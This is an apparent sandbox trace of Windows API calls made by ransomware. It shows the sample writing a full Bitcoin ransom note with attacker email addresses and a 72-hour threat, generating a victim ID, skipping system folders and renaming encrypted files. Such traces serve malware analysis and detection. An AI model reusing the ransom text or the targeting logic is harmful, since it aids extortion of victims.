	[0202.346] CloseHandle (hObject=0x388) returned 1
	[0202.346] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.346] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.346] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0202.347] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\HELP_DECRYPT_YOUR_FILES.HTML") returned 91
	[0202.347] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0202.347] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0202.347] WriteFile (in: hFile=0x388, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0202.350] CloseHandle (hObject=0x388) returned 1
	[0202.350] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.351] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.351] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0202.369] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0202.369] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0202.369] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0202.369] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0202.369] WriteFile (in: hFile=0x388, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0202.370] CloseHandle (hObject=0x388) returned 1
	[0202.370] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x921f7c75, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x922442c2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0202.370] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*") returned 66
	[0202.370] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.371] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\*.*", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*") returned 0x42
	[0202.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.371] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="windows") returned 0x0
	[0202.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.371] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="boot") returned 0x0
	[0202.371] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="system volume information") returned 0x0
	[0202.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0202.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="temp") returned 0x0
	[0202.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.372] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="program files") returned 0x0
	[0202.372] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="program files (x86)") returned 0x0
	[0202.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="appdata") returned 0x0
	[0202.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="application data") returned 0x0
	[0202.373] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.373] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="winnt") returned 0x0
	[0202.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.374] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="tmp") returned 0x0
	[0202.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.374] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="cache") returned 0x0
	[0202.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.374] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="temporary internet files") returned 0x0
	[0202.374] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.375] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="webcache") returned 0x0
	[0202.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.375] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="inetcache") returned 0x0
	[0202.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.375] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="nvidia") returned 0x0
	[0202.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.375] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="packages") returned 0x0
	[0202.375] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.376] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="cookies") returned 0x0
	[0202.376] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.376] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\*.*", lpSrch="programdata") returned 0x0
	[0202.376] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0202.377] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0202.377] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x921f7c75, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x922442c2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0202.377] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0202.377] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639514f0, ftCreationTime.dwHighDateTime=0x1d97066, ftLastAccessTime.dwLowDateTime=0xafde33e0, ftLastAccessTime.dwHighDateTime=0x1d9750d, ftLastWriteTime.dwLowDateTime=0xafde33e0, ftLastWriteTime.dwHighDateTime=0x1d9750d, nFileSizeHigh=0x0, nFileSizeLow=0xfe93, dwReserved0=0x0, dwReserved1=0x0, cFileName="6y1J3FWzFsU1Mn9GW5.avi", cAlternateFileName="6Y1J3F~1.AVI")) returned 1
	[0202.377] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920c69ea, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x920c69ea, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x920c69ea, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1340, dwReserved0=0x0, dwReserved1=0x0, cFileName="b5 8le_nsymjbdwicv.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="B58LE_~1.SCL")) returned 1
	[0202.377] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920eced0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x920eced0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x92112dc1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7030, dwReserved0=0x0, dwReserved1=0x0, cFileName="fjpb77qh_86nw7s-hy.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="FJPB77~1.SCL")) returned 1
	[0202.377] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922442c2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x922442c2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9226a317, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0202.378] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9221dfef, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9221dfef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x922442c2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0202.378] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x921f7c75, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x921f7c75, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x921f7c75, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11c10, dwReserved0=0x0, dwReserved1=0x0, cFileName="ljfqsspz60hkke5.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="LJFQSS~1.SCL")) returned 1
	[0202.378] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x921f7c75, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x921f7c75, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x921f7c75, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11c10, dwReserved0=0x0, dwReserved1=0x0, cFileName="ljfqsspz60hkke5.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="LJFQSS~1.SCL")) returned 0
	[0202.378] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0202.378] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0202.378] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a5758a0, ftCreationTime.dwHighDateTime=0x1d96edd, ftLastAccessTime.dwLowDateTime=0x309286a0, ftLastAccessTime.dwHighDateTime=0x1d9734f, ftLastWriteTime.dwLowDateTime=0x309286a0, ftLastWriteTime.dwHighDateTime=0x1d9734f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0OT", cAlternateFileName="")) returned 0
	[0202.379] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0202.379] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0202.379] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0xf54d5100, ftLastAccessTime.dwHighDateTime=0x1d9722d, ftLastWriteTime.dwLowDateTime=0xf54d5100, ftLastWriteTime.dwHighDateTime=0x1d9722d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pz4QOFg", cAlternateFileName="")) returned 0
	[0202.379] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0202.380] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0202.380] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4347fe61, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4347fe61, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0202.380] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891f52b2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891f52b2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90667e79, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0202.380] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891a8d32, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891a8d32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90640556, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0202.380] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905f43d8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x905f43d8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9061a3b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xfc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nsj6mwta.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="NSJ6MW~1.SCL")) returned 1
	[0202.380] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90640556, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90640556, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90640556, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pyf2.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PYF2FL~1.SCL")) returned 1
	[0202.380] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90640556, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90640556, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90640556, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pyf2.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PYF2FL~1.SCL")) returned 0
	[0202.381] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0202.381] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0202.381] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb82ebf88, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb82ebf88, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0202.381] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0202.381] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0202.382] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0
	[0202.382] FindClose (in: hFindFile=0xfb9930 | out: hFindFile=0xfb9930) returned 1
	[0202.382] FindClose (in: hFindFile=0xfb9930 | out: hFindFile=0xfb9930) returned 0
	[0202.382] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf96a590, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf96a590, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Windows", cAlternateFileName="")) returned 1
	[0202.383] lstrcmpW (lpString1="Windows", lpString2="..") returned 1
	[0202.383] lstrcmpW (lpString1="Windows", lpString2=".") returned 1
	[0202.383] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0202.383] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0202.383] lstrcatW (in: lpString1="C:\\", lpString2="Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows"
	[0202.383] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows"
	[0202.383] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\"
	[0202.383] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\Windows\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\"
	[0202.383] lstrcatW (in: lpString1="C:\\Windows\\", lpString2="*.*" | out: lpString1="C:\\Windows\\*.*") returned="C:\\Windows\\*.*"
	[0202.384] FindFirstFileW (in: lpFileName="C:\\Windows\\*.*" (normalized: "c:\\windows\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf96a590, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf96a590, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0202.384] lstrlenW (lpString="C:\\Windows\\*.*") returned 14
	[0202.384] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.384] CharLowerBuffW (in: lpsz="C:\\Windows\\*.*", cchLength=0xe | out: lpsz="c:\\windows\\*.*") returned 0xe
	[0202.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.385] StrStrW (lpFirst="c:\\windows\\*.*", lpSrch="windows") returned="windows\\*.*"
	[0202.385] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0202.385] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows"
	[0202.385] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\*.*" | out: lpString1="C:\\Windows\\*.*") returned="C:\\Windows\\*.*"
	[0202.385] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.385] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.385] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT") returned 38
